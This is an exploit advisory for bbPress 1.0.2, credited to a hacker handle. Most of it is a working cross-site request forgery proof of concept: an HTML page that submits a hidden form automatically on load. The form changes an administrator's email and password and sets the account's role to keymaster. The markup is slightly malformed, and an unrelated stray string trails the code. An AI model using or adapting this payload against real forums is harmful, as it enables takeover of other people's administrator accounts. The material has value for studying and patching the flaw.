: # Software: bbPress v 1.0.2: : # site: www.bbpress.org: : # date: 29/6/2010: : # Author: saudi0hacker : : # Date: May 25, 2010 : : # Type : CSRF: : # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com : :----------------------------------------------------------------------------: <html> <body onload="document.forms['Login'].submit();"> <form method="post" name = "Login" action="http://localhost/bb/profile.php?id=1&tab=edit"> <select type="hidden" name="display_name" id="display_name"> <option type="hidden" id="display_displayname" value="admin">admin</option> <input type="hidden" name="user_email" id="user_email"value="admin@sss.com" /> <inputid="_wpnonce" name="_wpnonce" value="98dfb69b68" /><input type="hidden" name="_wp_http_referer" value="/bb/profile.php?id=1&tab=edit" /> <select type="hidden" id="admininfo_role" name="role"> <option value="keymaster" selected="selected">Key Master</option> <input name="pass1" type="hidden" value= "admin1234" id="pass1" autocomplete="off" /> <input name="pass2" type="hidden" value= "admin1234" id="pass2" autocomplete="off" /> <input type="submit" name="Submit" value="save" />
体验盒子
